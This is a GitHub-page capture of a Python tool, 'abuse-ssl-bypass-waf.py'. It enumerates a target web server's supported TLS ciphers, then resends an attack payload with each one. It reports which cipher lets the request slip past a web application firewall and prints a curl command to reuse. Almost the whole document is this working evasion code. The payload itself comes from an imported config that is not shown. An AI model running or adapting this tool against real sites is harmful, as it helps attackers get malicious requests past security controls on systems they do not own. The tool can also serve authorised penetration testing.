-
Notifications
You must be signed in to change notification settings - Fork 73
/
Copy pathabuse-ssl-bypass-waf.py
171 lines (146 loc) · 5.8 KB
/
abuse-ssl-bypass-waf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
#
import re
import time
try:
import urlparse
except ModuleNotFoundError:
from urllib import parse as urlparse
import argparse
import threading
import subprocess
from threading import Timer
from multiprocessing.dummy import Pool
from config import *
def target_handle(target):
if not target.startswith("https://"):
target = "https://" + target.rstrip("/")
scheme, netloc, url, params, query, fragment = urlparse.urlparse(target)
return "{}://{}".format(scheme, netloc)
def is_alive():
global target
response = curl_request(target_handle(target), alive_command)
if response is None or response == "":
return False
else:
return True
def curl_request(target, command, timeout=15):
if "://" not in command[-1]:
command.append(target)
else:
command.remove(command[-1])
command.append(target)
execute = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
timer = Timer(timeout, execute.kill)
try:
timer.start()
stdout, stderr = execute.communicate()
return stdout
except:
return None
finally:
timer.cancel()
def get_supported_ciphers():
global target
ciphers = []
body = curl_request(target, ciphers_command, timeout=60)
for line in body.decode().split("\n"):
match = re.findall("(Accepted|Preferred)\s+(.*?)\s+(.*?)\s+bits\s+(.*)", line.strip())
if match:
ciphers.append(str(match[0][3]).split()[0])
return ciphers
def single_cipher_request(cipher):
global target, count, base_length, cipher_content_length
count = 0
command = []
for x in curl_command:
command.append(x)
command.append('--cipher')
command.append(cipher)
cipher_response = curl_request(target + payload_request, command)
mutex.acquire()
if enable_waf_keyword:
if not re.findall(hit_waf_regex, cipher_response):
if len(cipher_response) == 0:
count += 1
print("[+] Cipher:{:35} Response Length: [0]".format(cipher))
else:
print("[+] Success! Find Bypass Cipher: {}".format(cipher))
exit("[+] Please Test: [{}]".format('{} "{}"'.format(" ".join(curl_command[:-1]), target + payload_request)))
else:
count += 1
print("[-] Cipher:{:35} Filter By Waf!".format(cipher))
else:
cipher_length = len(cipher_response)
if base_length != cipher_length:
cipher_content_length.append({cipher: cipher_length})
print("[+] Cipher:{:35} Response Length: [{}]".format(cipher, cipher_length))
elif cipher_length == 0:
print("[+] Cipher:{:35} Response Length: [0]".format(cipher))
else:
count += 1
print("[+] Cipher:{:35} Response Length: [Same as Base Response]".format(cipher))
mutex.release()
def bypass_testing(threads=1):
global target, base_length
if is_alive():
print("[+] Target: {} is alive".format(target))
else:
exit("[-] Target: {} cannot connected".format(target))
print("[+] Testing Web Server Supported SSL/TLS Ciphers ...")
ciphers = get_supported_ciphers()
if len(ciphers) > 0:
print("[+] {} Supported [{}] SSL/TLS Ciphers".format(target, len(ciphers)))
else:
exit("[-] No SSL/TLS Ciphers of target supported")
base_content_1 = curl_request(target, curl_command)
base_content_2 = curl_request(target + normal_request, curl_command)
if len(base_content_1) == len(base_content_2):
base_length = len(base_content_1)
print("[!] Response-1 == Response-2 length:[{}]".format(len(base_content_1)))
else:
base_length = len(base_content_2)
print("[+] Request-1:{} Request-2:{}".format(target, target + normal_request))
print("[!] Response-1 length:[{}] != Response-2 length:[{}]".format(len(base_content_1), len(base_content_2)))
print("[+] Now Request: {}".format(target + payload_request))
if threads > 1:
pool = Pool(threads)
pool.map(single_cipher_request, ciphers)
pool.close()
pool.join()
else:
for cipher in ciphers:
single_cipher_request(cipher)
if not enable_waf_keyword:
bcl_count = 0
base_cipher_length = list(dict(cipher_content_length[0]).values())[0]
for d in cipher_content_length:
if list(dict(d).values())[0] == base_cipher_length:
bcl_count += 1
else:
bcl_count = -1
if count == len(ciphers) or bcl_count == len(ciphers):
print("[-] Failed! Abusing SSL/TLS Ciphers Cannot Bypass Waf")
else:
print("[*] Finished! Please check response content length and find whether there is bypass way")
if __name__ == "__main__":
start = time.time()
parser = argparse.ArgumentParser(prog='abuse-ssl-bypass-waf.py')
parser.add_argument("-regex", dest='regex', default='default', help="hit waf keyword or regex")
parser.add_argument("-thread", dest='thread', default=1, type=int, help="numbers of multi threads")
parser.add_argument("-target", dest='target', default='default', help="the host ip or domain")
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
if args.regex != 'default':
enable_waf_keyword = True
hit_waf_regex = args.regex
count = 0
base_length = 0
target = target_handle(args.target)
cipher_content_length = []
mutex = threading.Lock()
bypass_testing(int(str(args.thread)))
print("[+] Cost: {:.6} seconds".format(time.time() - start))